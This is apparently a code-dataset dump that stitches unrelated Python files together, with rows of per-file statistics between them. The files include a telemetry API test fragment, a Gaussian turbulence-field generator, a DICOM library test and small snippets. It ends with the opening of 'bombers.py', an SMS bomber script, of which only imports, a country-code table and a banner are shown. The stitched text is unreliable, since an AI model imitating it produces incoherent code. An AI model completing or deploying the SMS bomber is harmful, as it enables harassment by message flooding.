"failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ] }}', self.response_catcher.response.raw_body)
160.309524
5,269
0.595797
1,111
13,466
7.160216
0.230423
0.022627
0.041483
0.049026
0.893023
0.893023
0.887995
0.880704
0.880704
0.868385
0
0.108838
0.252191
13,466
83
5,270
162.240964
0.681132
0.11659
0
0.344828
1
0.068966
0.686213
0.159973
0
0
0
0
0.275862
1
0.103448
false
0
0.172414
0
0.310345
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
1
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
ba10fe2ad6528e4b6876ac4e447d30e296c666c6
17,420
py
Python
gaussian_fields/turboGen.py
jdhare/turbulence_tracing
6df5e1da29a3132a488f57b43379d262b7182045
[ "MIT" ]
1
2020-12-05T05:43:29.000Z
2020-12-05T05:43:29.000Z
gaussian_fields/turboGen.py
bbw7561135/turbulence_tracing
26b980befbcbdbee367e3695a40928841f0cd38a
[ "MIT" ]
null
null
null
gaussian_fields/turboGen.py
bbw7561135/turbulence_tracing
26b980befbcbdbee367e3695a40928841f0cd38a
[ "MIT" ]
1
2020-12-05T05:43:30.000Z
2020-12-05T05:43:30.000Z
# TURBOGEN collection of method to generate fluctuation density field # I can imagine to implement 1D, 2D and 3D turbulence generator method """ Author: Stefano Merlini Created: 14/05/2020 """ # function that computes the turbulence base don a given parameters: # - grid and domain definitions # - spectra # ----------------------------------------------------------------------------------------- # ____ _ _ ____ ____ __ ___ ____ __ _ ____ ____ __ ____ __ ____ # (_ _)/ )( \( _ \( _ \ / \ / __)( __)( ( \( __)( _ \ / _\(_ _)/ \( _ \ # )( ) \/ ( ) / ) _ (( O )( (_ \ ) _) / / ) _) ) // \ )( ( O )) / # (__) \____/(__\_)(____/ \__/ \___/(____)\_)__)(____)(__\_)\_/\_/(__) \__/(__\_) # ----------------------------------------------------------------------------------------- # import numpy as np # __ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____ # / \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___) # (_/ /(___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \ # (__) (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/ # this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields" # Additional reference: Shinozuka, M. and Deodatis, G. (1996) def gaussian1Dcos(lx, nx, nmodes, wn1, especf): """ Given a specific energy spectrum, this function generates 1-D Gaussian field whose energy spectrum corresponds to the the input energy spectrum. Parameters: ----------------------------------------------------------------- lx: float the domain size in the x-direction. nx: integer the number of grid points in the x-direction nmodes: integer Number of modes wn1: float Smallest wavenumber. Typically dictated by spectrum or domain espec: function A callback function representing the energy spectrum in input ----------------------------------------------------------------- EXAMPLE: # define spectrum class k41: def evaluate(self, k): espec = pow(k,-5.0/3.0) return espec # user input nx = 64 lx = 1 nmodes = 100 inputspec = 'k41' whichspect = k41().evaluate wn1 = 2.0*np.pi/lx rx = tg.gaussian1D(lx, nx, nmodes, wn1, whichspect) dx = lx/nx X = np.arange(0, lx, dx) plt.plot(X,rx, 'k-', label='computed') """ # ----------------------------------------------------------------- # cell size in X-direction dx = lx/nx # Compute the highest wavenumber (wavenumber cutoff) wnn = np.pi/dx print("This function will generate data up to wavenumber: ", wnn) # compute the infinitesiaml wavenumber (step dk) dk = (wnn-wn1)/nmodes # compute an array of equal-distance wavenumbers at the cells centers wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk dkn = np.ones(nmodes)*dk # Calculating the proportional factor (using the input power spectrum) espec = especf(wn) espec = espec.clip(0.0) A_m = np.sqrt(2.0*espec*dkn) # for each mode I need a proportional factor ('colouring' the spectrum) # Generate Random phase angles from a normal distribution between 0 and 2pi phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) psi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) kx = wn # computing the center position of the cell xc = dx/2.0 + np.arange(0,nx)*dx _r = np.zeros(nx) print("Generating 1-D turbulence...") for i in range(0,nx): # for every step i along x-direction do the fourier summation arg1 = kx*xc[i] + phi bmx = A_m * np.sqrt(2.0) *(np.cos(arg1)) _r[i] = np.sum(bmx) print("Done! 1-D Turbulence has been generated!") return _r # ____ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____ # (___ \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___) # / __/(___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \ # (____) (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/ # this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields" # Additional reference: Shinozuka, M. and Deodatis, G. (1996) def gaussian2Dcos(lx, ly, nx, ny, nmodes, wn1, especf): """ Given a specific energy spectrum, this function generates 2-D Gaussian field whose energy spectrum corresponds to the the input energy spectrum. Parameters: ---------------------------------------------------------------- lx: float the domain size in the x-direction. ly: float the domain size in the y-direction. nx: integer the number of grid points in the x-direction ny: integer the number of grid points in the y-direction nmodes: integer Number of modes wn1: float Smallest wavenumber. Typically dictated by spectrum or domain espec: function A callback function representing the energy spectrum in input ----------------------------------------------------------------- EXAMPLE: import turboGen as tg import calcspec # define spectrum class k41: def evaluate(self, k): espec = pow(k,-5.0/3.0) return espec # user input nx = 64 ny = 64 lx = 1 ly = 1 nmodes = 100 inputspec = 'k41' whichspect = k41().evaluate wn1 = min(2.0*np.pi/lx, 2.0*np.pi/ly) r = tg.gaussian1D(lx, ly, nx, ny, nmodes, wn1, whichspect) dx = lx/nx dy = ly/ny X = np.arange(0, lx, dx) Y = np.arange(0, ly, dy) X, Y = np.meshgrid(np.arange(0,lx,dx), np.arange(0,ly,dy)) cp = plt.contourf(X, Y, r) cb = plt.colorbar(cp) # I you want to calculate the spectrum knyquist, wavenumbers, tkespec = calcspec.compute2Dspectum(r, lx, ly, False) """ # -------------------------------------------------------------------------- # cell size in X and Y directions dx = lx/nx dy = ly/ny # Compute the highest wavenumber (wavenumber cutoff) wnn = max(np.pi/dx,np.pi/dy) print("This function will generate data up to wavenumber: ", wnn) # compute the infinitesiaml wavenumber (step dk) dk = (wnn - wn1)/nmodes # compute an array of equal-distance wavenumbers at the cells centers wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk dkn = np.ones(nmodes)*dk # Calculating the proportional factor (using the input power spectrum) espec = especf(wn) espec = espec.clip(0.0) A_m = np.sqrt(2.0*espec*(dkn)**2) # for each mode I need a proportional factor ('colouring' the spectrum) # Generate Random phase angles from a normal distribution between 0 and 2pi phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) psi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) theta = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) # kx = np.cos(theta)*wn ky = np.sin(theta)*wn # Computing the vector [xc,yc] xc = dx / 2.0 + np.arange(0, nx) * dx yc = dy / 2.0 + np.arange(0, ny) * dy # Looping through 2-Dimensions nx, ny and perfom the Fourier Summation # computing the center position of the cell xc = dx/2.0 + np.arange(0,nx)*dx yc = dy/2.0 + np.arange(0,ny)*dy _r = np.zeros((nx,ny)) print("Generating 2-D turbulence...") for j in range(0,ny): for i in range(0,nx): # for every step i along x-y direction do the fourier summation arg1 = kx*xc[i] + ky*yc[j] + phi arg2 = kx*xc[i] - ky*yc[j] + psi bm = A_m * np.sqrt(2.0) *(np.cos(arg1) + np.cos(arg2)) _r[i,j] = np.sum(bm) print("Done! 2-D Turbulence has been generated!") return _r # ____ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____ # ( __ \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___) # (__ ((___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \ # (____/ (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/ # this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields" # Additional reference: Shinozuka, M. and Deodatis, G. (1996) def gaussian3Dcos(lx, ly, lz, nx, ny, nz, nmodes, wn1, especf): """ Given a specific energy spectrum, this function generates 3-D Gaussian field whose energy spectrum corresponds to the the input energy spectrum. Parameters: ---------------------------------------------------------------- lx: float the domain size in the x-direction. ly: float the domain size in the y-direction. lz: float the domain size in the z-direction. nx: integer the number of grid points in the x-direction ny: integer the number of grid points in the y-direction nz: integer the number of grid points in the z-direction nmodes: integer Number of modes wn1: float Smallest wavenumber. Typically dictated by spectrum or domain espec: function A callback function representing the energy spectrum in input ----------------------------------------------------------------- EXAMPLE: import turboGen as tg import calcspec # define spectrum class k41: def evaluate(self, k): espec = pow(k,-5.0/3.0) return espec # user input nx = 64 ny = 64 nz = 64 lx = 1 ly = 1 lz = 1 nmodes = 100 inputspec = 'k41' whichspect = k41().evaluate wn1 = min(2.0*np.pi/lx, 2.0*np.pi/ly, 2.0*np.pi/lz) r = tg.gaussian1D(lx, ly, lz, nx, ny, nz, nmodes, wn1, whichspect) dx = lx/nx dy = ly/ny dz = lz/nz X = np.arange(0, lx, dx) Y = np.arange(0, ly, dy) Z = np.arange(0, lz, dz) X, Y = np.meshgrid(np.arange(0,lx,dx), np.arange(0,ly,dy)) cp = plt.contourf(X, Y, r(:,:,1)) cb = plt.colorbar(cp) # I you want to calculate the spectrum knyquist, wavenumbers, tkespec = calcspec.compute3Dspectum(r, lx, ly, lz, False) """ # -------------------------------------------------------------------------- # cell size in X, Y, Z directions dx = lx/nx dy = ly/ny dz = lz/nz # Compute the highest wavenumber (wavenumber cutoff) wnn = max(np.pi/dx,np.pi/dy,np.pi/dz) print("This function will generate data up to wavenumber: ", wnn) # compute the infinitesiaml wavenumber (step dk) dk = (wnn - wn1)/nmodes # compute an array of equal-distance wavenumbers at the cells centers wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk dkn = np.ones(nmodes)*dk # Calculating the proportional factor (using the input power spectrum) espec = especf(wn) espec = espec.clip(0.0) A_m = np.sqrt(2.0*espec*(dkn)**3) # for each mode I need a proportional factor ('colouring' the spectrum) # Generate Random phase angles from a normal distribution between 0 and 2pi psi_1 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) psi_2 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) psi_3 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) psi_4 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) theta = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes) # kx = np.sin(theta) * np.cos(phi) * wn; ky = np.sin(theta) * np.sin(phi) * wn; kz = np.cos(theta) * wn; # Computing the vector [xc,yc,zc] xc = dx / 2.0 + np.arange(0, nx) * dx yc = dy / 2.0 + np.arange(0, ny) * dy zc = dz / 2.0 + np.arange(0, nz) * dz # Looping through 3-Dimensions nx, ny, nz and perfom the Fourier Summation # computing the center position of the cell xc = dx/2.0 + np.arange(0,nx)*dx yc = dy/2.0 + np.arange(0,ny)*dy zc = dz/2.0 + np.arange(0,nz)*dz _r = np.zeros((nx,ny,nz)) print("Generating 3-D turbulence...") for k in range(0,nz): for j in range(0,ny): for i in range(0,nx): # for every step i along x-y-z direction do the fourier summation arg1 = kx*xc[i] + ky*yc[j] + kz*zc[k] + psi_1 arg2 = kx*xc[i] + ky*yc[j] - kz*zc[k] + psi_2 arg3 = kx*xc[i] - ky*yc[j] + kz*zc[k] + psi_3 arg4 = kx*xc[i] - ky*yc[j] - kz*zc[k] + psi_4 bm = A_m * np.sqrt(2.0) * (np.cos(arg1) + np.cos(arg2) + np.cos(arg3) + np.cos(arg4)) _r[i,j,k] = np.sum(bm) print("Done! 3-D Turbulence has been generated!") return _r def gaussian1D_FFT(N, k_func): """A FFT based generator for scalar gaussian fields in 1D Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995): 1–30. https://doi.org/10.1017/CBO9781107415324.004. Arguments: L_drive {float} -- Driving length scale N {int} -- size of domain will be (2*N+1) k_func {function} -- a function which takes an input k Returns: signal {1D array of floats} -- a realisation of a 1D Gaussian process. Example: L_drive = 1e-2 def power_spectrum(k,a): return k**-a def k41(k): return power_spectrum(k, 5/3) sig = gaussian1D_FFT( N, k41) fig,ax = plt.subplots() x = np.linspace(-N,N, 2*N+1) ax.plot(x, sig) """ M=2*N+1 k=np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0. K=np.sqrt(k**2) K=np.fft.fftshift(K)#numpy convention, highest frequencies at the centre Wr=np.random.randn(M) # random number from Gaussian for both Wi=np.random.randn(M) # real and imaginary components Wr = Wr + np.flip(Wr) #f(-k)=f*(k) Wi = Wi - np.flip(Wi) W = Wr+1j*Wi F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here. F_shift=np.fft.ifftshift(F) F_shift[0]=0 # 0 mean signal=np.fft.ifftn(F_shift) return signal.real def gaussian2D_FFT(N, k_func): """A FFT based generator for scalar gaussian fields in 1D Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995): 1–30. https://doi.org/10.1017/CBO9781107415324.004. Arguments: L_drive {float} -- Driving length scale N {int} -- size of domain will be (2*N+1)^2 k_func {function} -- a function which takes an input k Returns: signal {2D array of floats} -- a realisation of a 2D Gaussian process. Example: N = 100 L_drive = 1e-2 def power_spectrum(k,a): return k**-a def k41(k): return power_spectrum(k, 5/3) sig = gaussian2D_FFT(N, k41) fig,ax=plt.subplots() ax.imshow(sig, cmap='bwr', extent=[-N,N,-N,N]) """ M=2*N+1 k=np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0. KX,KY=np.meshgrid(k,k) K=np.sqrt(KX**2+KY**2) K=np.fft.fftshift(K)#numpy convention, highest frequencies at the centre Wr=np.random.randn(M, M) # random number from Gaussian for both Wi=np.random.randn(M, M) # real and imaginary components Wr = Wr + np.flip(Wr) #f(-k)=f*(k) Wi = Wi - np.flip(Wi) W = Wr+1j*Wi F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here. F_shift=np.fft.ifftshift(F) F_shift[0,0]=0 # 0 mean signal=np.fft.ifftn(F_shift) return signal.real def gaussian3D_FFT(N, k_func): """A FFT based generator for scalar gaussian fields in 1D Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995): 1–30. https://doi.org/10.1017/CBO9781107415324.004. Arguments: N {int} -- size of domain will be (2*N+1)^3 k_func {function} -- a function which takes an input k Returns: signal {3D array of floats} -- a realisation of a 3D Gaussian process. Example: N = 100 def power_spectrum(k,a): return k**-a def k41(k): return power_spectrum(k, 5/3) sig = gaussian3D_FFT(N, k41) fig,ax=plt.subplots(3,3, figsize=(8,8), sharex=True, sharey=True) ax=ax.flatten() for a in ax: r=np.random.randint(0,ny) d=sig[r,:,:] a.imshow(d, cmap='bwr', extent=[-N,N,-N,N]) a.set_title("y="+str(r)) """ M = 2*N+1 k = np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0. KX,KY,KZ = np.meshgrid(k,k,k) K = np.sqrt(KX**2+KY**2+KZ**2) K = np.fft.fftshift(K)#numpy convention, highest frequencies at the centre Wr = np.random.randn(M, M, M) # random number from Gaussian for both Wi = np.random.randn(M, M, M) # real and imaginary components Wr = Wr + np.flip(Wr) #f(-k)=f*(k) Wi = Wi - np.flip(Wi) W = Wr+1j*Wi F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here. F_shift = np.fft.ifftshift(F) F_shift[0,0,0] = 0 # 0 mean signal = np.fft.ifftn(F_shift) return signal.real
32.379182
109
0.556889
2,469
17,420
3.72175
0.130822
0.0074
0.013494
0.0111
0.891065
0.865927
0.857438
0.816629
0.810426
0.786593
0
0.039467
0.271297
17,420
538
110
32.379182
0.684182
0.64271
0
0.564286
1
0
0.068156
0
0
0
0
0
0
1
0.042857
false
0
0.007143
0
0.092857
0.064286
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
ba18cd8ff212404246eb251ede3803dc3458611d
5,221
py
Python
mudicom/tests/test_read.py
neurosnap/mudicom
04011967007409f0c5253b4f308f53a7b0fc99c6
[ "MIT" ]
32
2015-01-09T10:51:06.000Z
2021-04-03T09:50:52.000Z
mudicom/tests/test_read.py
neurosnap/mudicom
04011967007409f0c5253b4f308f53a7b0fc99c6
[ "MIT" ]
3
2015-05-07T19:15:26.000Z
2021-04-16T15:13:23.000Z
mudicom/tests/test_read.py
neurosnap/mudicom
04011967007409f0c5253b4f308f53a7b0fc99c6
[ "MIT" ]
18
2015-04-11T14:24:42.000Z
2020-12-27T21:26:06.000Z
import os.path import unittest import gdcm import mudicom class TestRead(unittest.TestCase): def setUp(self): nose_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "dicoms") self.fnames = (os.path.join(nose_dir, "ex1.dcm"), os.path.join(nose_dir, "ex2.dcm"),) def test_get_dataset(self): for fname in self.fnames: mu = mudicom.load(fname) ds = mu.read() self.assertIsInstance(ds, list) self.assertIsNot(len(ds), 0) for element in ds: self.assertTrue(hasattr(element, "name")) self.assertTrue(hasattr(element, "value")) self.assertTrue(hasattr(element, "VR")) self.assertTrue(hasattr(element, "VL")) self.assertTrue(hasattr(element, "tag")) self.assertTrue("group" in element.tag) self.assertTrue("element" in element.tag) self.assertTrue("str" in element.tag) def test_map_VR(self): self.assertEqual(mudicom.lookup.VR(VR="AE"), "Application Entity") self.assertEqual(mudicom.lookup.VR("OB"), "Other Byte") self.assertEqual(mudicom.lookup.VR("US"), "Unsigned Short") self.assertEqual(mudicom.lookup.VR(description="Time"), "TM") self.assertEqual(mudicom.lookup.VR(description="Unknown"), "UN") self.assertEqual(mudicom.lookup.VR(description="Sequence of Items"), "SQ") self.assertEqual(None, mudicom.lookup.VR("ZZ")) self.assertEqual(None, mudicom.lookup.VR("Hi there")) def test_map_VR_deprecated(self): self.assertEqual(mudicom.lookup_VR(VR="AE"), "Application Entity") self.assertEqual(mudicom.lookup_VR("OB"), "Other Byte") self.assertEqual(mudicom.lookup_VR("US"), "Unsigned Short") self.assertEqual(mudicom.lookup_VR(description="Time"), "TM") self.assertEqual(mudicom.lookup_VR(description="Unknown"), "UN") self.assertEqual(mudicom.lookup_VR(description="Sequence of Items"), "SQ") self.assertEqual(None, mudicom.lookup_VR("ZZ")) self.assertEqual(None, mudicom.lookup_VR("Hi there")) def test_map_ts(self): self.assertEqual(mudicom.lookup.transfer_syntax(UID="1.2.840.10008.1.2"), "Implicit VR Endian: Default Transfer Syntax for DICOM") self.assertEqual(mudicom.lookup.transfer_syntax("1.2.840.10008.1.2.4.80"), "JPEG-LS Lossless Image Compression") self.assertEqual(mudicom.lookup.transfer_syntax("1.2.840.10008.1.2.4.91"), "JPEG 2000 Image Compression") self.assertEqual(mudicom.lookup.transfer_syntax(description="JPIP Referenced"), "1.2.840.10008.1.2.4.94") self.assertEqual(mudicom.lookup.transfer_syntax(description="RFC 2557 MIME Encapsulation"), "1.2.840.10008.1.2.6.1") self.assertEqual(mudicom.lookup.transfer_syntax(description="Deflated Explicit VR Big Endian"), "1.2.840.10008.1.2.1.99") self.assertEqual(None, mudicom.lookup.transfer_syntax("0.0.0.0")) self.assertEqual(None, mudicom.lookup.transfer_syntax("Hi there")) def test_map_ts_deprecated(self): self.assertEqual(mudicom.lookup_transfer_syntax(UID="1.2.840.10008.1.2"), "Implicit VR Endian: Default Transfer Syntax for DICOM") self.assertEqual(mudicom.lookup_transfer_syntax("1.2.840.10008.1.2.4.80"), "JPEG-LS Lossless Image Compression") self.assertEqual(mudicom.lookup_transfer_syntax("1.2.840.10008.1.2.4.91"), "JPEG 2000 Image Compression") self.assertEqual(mudicom.lookup_transfer_syntax(description="JPIP Referenced"), "1.2.840.10008.1.2.4.94") self.assertEqual(mudicom.lookup_transfer_syntax(description="RFC 2557 MIME Encapsulation"), "1.2.840.10008.1.2.6.1") self.assertEqual(mudicom.lookup_transfer_syntax(description="Deflated Explicit VR Big Endian"), "1.2.840.10008.1.2.1.99") self.assertEqual(None, mudicom.lookup_transfer_syntax("0.0.0.0")) self.assertEqual(None, mudicom.lookup_transfer_syntax("Hi there")) def test_walk_dataset(self): for fname in self.fnames: mu = mudicom.load(fname) #reader = mu.read() tags = list(mu.walk(lambda ds: ds.GetTag())) self.assertIsInstance(tags, list) self.assertIsNot(len(tags), 0) for tag in tags: self.assertIsInstance(tag, gdcm.Tag) tags = list(mu.walk(lambda ds: None)) self.assertIsInstance(tags, list) for tag in tags: self.assertEqual(tag, None) tags = list(mu.walk(lambda ds: False)) self.assertIsInstance(tags, list) for tag in tags: self.assertFalse(tag) tags = list(mu.walk(lambda ds: True)) self.assertIsInstance(tags, list) for tag in tags: self.assertTrue(tag) def test_get_element(self): for fname in self.fnames: mu = mudicom.load(fname) #reader = mu.read() self.assertIsInstance(mu.find(0x004, 0x1220), list) self.assertIsInstance(mu.find(name="Modality"), list) self.assertIsInstance(mu.find(VR="PN"), list)
49.72381
138
0.646428
676
5,221
4.911243
0.177515
0.149096
0.159036
0.20241
0.797892
0.749096
0.727711
0.712651
0.712651
0.672892
0
0.050963
0.214518
5,221
104
139
50.201923
0.758595
0.006895
0
0.162791
0
0
0.173838
0.042061
0
0
0.002122
0
0.627907
1
0.093023
false
0
0.046512
0
0.151163
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
7
2cd3e50e0e7049e6b9460273f71f4af4c0f9dd70
271
py
Python
tests/segment_tree/context.py
niemmi/algolib
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
[ "BSD-3-Clause" ]
null
null
null
tests/segment_tree/context.py
niemmi/algolib
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
[ "BSD-3-Clause" ]
null
null
null
tests/segment_tree/context.py
niemmi/algolib
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
[ "BSD-3-Clause" ]
null
null
null
import os import sys sys.path.insert(0, os.path.abspath('../..')) from algolib.segment_tree import segment_tree from algolib.segment_tree import segment_tree_flex from algolib.segment_tree import lazy_segment_tree from algolib.segment_tree import lazy_segment_tree_flex
30.111111
55
0.841328
43
271
5.023256
0.302326
0.407407
0.333333
0.407407
0.759259
0.759259
0.759259
0.398148
0
0
0
0.004032
0.084871
271
8
56
33.875
0.866935
0
0
0
0
0
0.01845
0
0
0
0
0
0
1
0
true
0
0.857143
0
0.857143
0
0
0
0
null
1
1
1
0
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
9
2cddf15893e1e2ed8c8d8d621dbaa8c9a5a17cb0
167
py
Python
notebook/positive_negative_zero.py
vhn0912/python-snippets
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
[ "MIT" ]
174
2018-05-30T21:14:50.000Z
2022-03-25T07:59:37.000Z
notebook/positive_negative_zero.py
vhn0912/python-snippets
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
[ "MIT" ]
5
2019-08-10T03:22:02.000Z
2021-07-12T20:31:17.000Z
notebook/positive_negative_zero.py
vhn0912/python-snippets
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
[ "MIT" ]
53
2018-04-27T05:26:35.000Z
2022-03-25T07:59:37.000Z
print(0) # 0 print(-0) # 0 print(0 == -0) # True print(0 is -0) # True print(0.0) # 0.0 print(-0.0) # -0.0 print(0.0 == -0.0) # True print(0.0 is -0.0) # False
6.958333
18
0.508982
38
167
2.236842
0.131579
0.329412
0.576471
0.376471
0.870588
0.564706
0.317647
0.317647
0.317647
0.317647
0
0.1875
0.233533
167
23
19
7.26087
0.476563
0.197605
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0
0
0
1
0
0
0
null
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
7
fa6c7fcc53a6b969fb14bc9d0521cba5f8d595cd
68,156
py
Python
bombers.py
GHOST-PSYCHO/SMS-Bombers
d8c5248d5881c27398aae4d6d561332828515b39
[ "Apache-2.0" ]
1
2020-06-26T10:00:55.000Z
2020-06-26T10:00:55.000Z
bombers.py
GHOST-PSYCHO/SMS-Bombers
d8c5248d5881c27398aae4d6d561332828515b39
[ "Apache-2.0" ]
null
null
null
bombers.py
GHOST-PSYCHO/SMS-Bombers
d8c5248d5881c27398aae4d6d561332828515b39
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python from datetime import datetime #line:2:from datetime import datetime from termcolor import cprint #line:3:from termcolor import cprint import os #line:4:import os import hashlib #line:5:import hashlib import sys #line:6:import sys import time #line:7:import time import threading #line:8:import threading import string #line:9:import string import random #line:10:import random import base64 #line:11:import base64 import urllib .request #line:12:import urllib.request import urllib .parse #line:13:import urllib.parse try :#line:15:try: import requests #line:16:import requests except ImportError :#line:17:except ImportError: print ('[!] Error: some dependencies are not installed')#line:18:print('[!] Error: some dependencies are not installed') print ('Type \'pip install -r requirements.txt\' to install all required packages')#line:19:print('Type \'pip install -r requirements.txt\' to install all required packages') exit ()#line:20:exit() country_codes ={'93':'AF','355':'AL','213':'DZ','376':'AD','244':'AO','672':'AQ','54':'AR','374':'AM','297':'AW','61':'AU','43':'AT','994':'AZ','973':'BH','880':'BD','375':'BY','32':'BE','501':'BZ','229':'BJ','975':'BT','591':'BO','387':'BA','267':'BW','55':'BR','246':'IO','673':'BN','359':'BG','226':'BF','257':'BI','855':'KH','237':'CM','238':'CV','236':'CF','235':'TD','56':'CL','86':'CN','57':'CO','269':'KM','682':'CK','506':'CR','385':'HR','53':'CU','599':'AN','357':'CY','420':'CZ','243':'CD','45':'DK','253':'DJ','670':'TL','593':'EC','20':'EG','503':'SV','240':'GQ','291':'ER','372':'EE','251':'ET','500':'FK','298':'FO','679':'FJ','358':'FI','33':'FR','689':'PF','241':'GA','220':'GM','995':'GE','49':'DE','233':'GH','350':'GI','30':'GR','299':'GL','502':'GT','224':'GN','245':'GW','592':'GY','509':'HT','504':'HN','852':'HK','36':'HU','354':'IS','91':'IN','62':'ID','98':'IR','964':'IQ','353':'IE','972':'IL','39':'IT','225':'CI','81':'JP','962':'JO','254':'KE','686':'KI','383':'XK','965':'KW','996':'KG','856':'LA','371':'LV','961':'LB','266':'LS','231':'LR','218':'LY','423':'LI','370':'LT','352':'LU','853':'MO','389':'MK','261':'MG','265':'MW','60':'MY','960':'MV','223':'ML','356':'MT','692':'MH','222':'MR','230':'MU','262':'RE','52':'MX','691':'FM','373':'MD','377':'MC','976':'MN','382':'ME','212':'EH','258':'MZ','95':'MM','264':'NA','674':'NR','977':'NP','31':'NL','687':'NC','64':'NZ','505':'NI','227':'NE','234':'NG','683':'NU','850':'KP','47':'SJ','968':'OM','92':'PK','680':'PW','970':'PS','507':'PA','675':'PG','595':'PY','51':'PE','63':'PH','48':'PL','351':'PT','974':'QA','242':'CG','40':'RO','7':'RU','250':'RW','590':'MF','290':'SH','508':'PM','685':'WS','378':'SM','239':'ST','966':'SA','221':'SN','381':'RS','248':'SC','232':'SL','65':'SG','421':'SK','386':'SI','677':'SB','252':'SO','27':'ZA','82':'KR','211':'SS','34':'ES','94':'LK','249':'SD','597':'SR','268':'SZ','46':'SE','41':'CH','963':'SY','886':'TW','992':'TJ','255':'TZ','66':'TH','228':'TG','690':'TK','676':'TO','216':'TN','90':'TR','993':'TM','688':'TV','256':'UG','380':'UA','971':'AE','44':'GB','1':'US','598':'UY','998':'UZ','678':'VU','379':'VA','58':'VE','84':'VN','681':'WF','967':'YE','260':'ZM','263':'ZW'}#line:229:} def banner ():#line:232:def banner(): cprint (""" ██████╗░██████╗░   ██████╗░░█████╗░███╗░░░███╗██████╗░███████╗██████╗░░██████╗   ██████╗░██╗░░░██╗ ██╔══██╗██╔══██╗   ██╔══██╗██╔══██╗████╗░████║██╔══██╗██╔════╝██╔══██╗██╔════╝   ██╔══██╗╚██╗░██╔╝ ██████╦╝██║░░██║   ██████╦╝██║░░██║██╔████╔██║██████╦╝█████╗░░██████╔╝╚█████╗░   ██████╦╝░╚████╔╝░ ██╔══██╗██║░░██║   ██╔══██╗██║░░██║██║╚██╔╝██║██╔══██╗██╔══╝░░██╔══██╗░╚═══██╗   ██╔══██╗░░╚██╔╝░░ ██████╦╝██████╔╝   ██████╦╝╚█████╔╝██║░╚═╝░██║██████╦╝███████╗██║░░██║██████╔╝   ██████╦╝░░░██║░░░ ╚═════╝░╚═════╝░   ╚═════╝░░╚════╝░╚═╝░░░░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝╚═════╝░   ╚═════╝░░░░╚═╝░░░ 